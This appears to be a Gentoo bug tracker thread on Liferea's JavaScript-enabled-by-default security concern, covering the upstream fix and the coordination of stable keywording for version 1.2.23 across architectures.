Subject says it all. Malicious web sites have an open door, as the option to turn it off is buried in the preferences. Liferea can use the gnome browser mechanism, or several other browsers. I have not checked if the option is promoted to them, but then, if not, why have the option, at all?
a related security problem was reported in http://sourceforge.net/tracker/index.php?func=detail&aid=1543623&group_id=87005&atid=581684 and is now fixed in upstream cvs, so I'll close this when this is in the tarballs and unmasked.
Reassigning to security. Note to reporter: non security devs are not able to access the bug when you restrict it to the security group.
Micheal please advise.
Pulling in new maintainer to advise.
According to that upstream bug, the fix went into 1.1.2; 1.2.x has been in the tree for a long time, but it can't go stable until xulrunner is stable (ppc64 and sparc holding out there). I was planning on submitting 1.2.7 for stable relatively soon, pending that xulrunner issue. I don't know a whole lot about javascript vulnerabilites. Are they important? I had thought (possibly erroniously) that javascript was fairly safe to have enabled. Is a feed reader a serious potential attach vector? Yes, it's poll, but the user has to specifically subscribe to feeds. I guess security's opinion here should matter.
i don't think that is serious until there is another vulnerability. BTW, is javascript in liferea really useful??
Daniel, do you have any updates about the xulrunner issue which was blocking stabilization of 1.2.x? btw I agree with falco, Javascript issues are not very serious in general, though that issue should be fixed anyway.
xulrunner is now okay; the current blocker is networkmanager. No version of it is stable.
(In reply to comment #9) > xulrunner is now okay; the current blocker is networkmanager. No version of it > is stable. networkmanager is stable on all needed arches, so I propose to call arches here on 1.2.23 prematurely.
Daniel is 1.2.3 ready for stable marking?
1.2.23 is fine. I apparently accidentally committed amd64 stable by accident, so you can leave amd64 out. FTR, repoman and pcheck still complain about x86-fbsd and repoman.
Thx Daniel. Arches please test and mark stable. Target keywords are: liferea-1.2.23.ebuild:KEYWORDS="amd64 ppc ppc64 sparc x86" Note:amd64 is already stable but cc'ing arch team so they can actually test:-)
x86 stable
(FTR, I'm a member of the amd64 team and have, in fact, tested on amd64... I believe this should be sufficient.)
Then let's remove amd64. Though it was not obvious from your first comment that you had actually tested:-)
ppc stable
seems to work fine in sparc. Stable!
ppc64 stable (uhmm.. late again. sorry.)
Voting time!
I vote NO.
Voting NO and closing.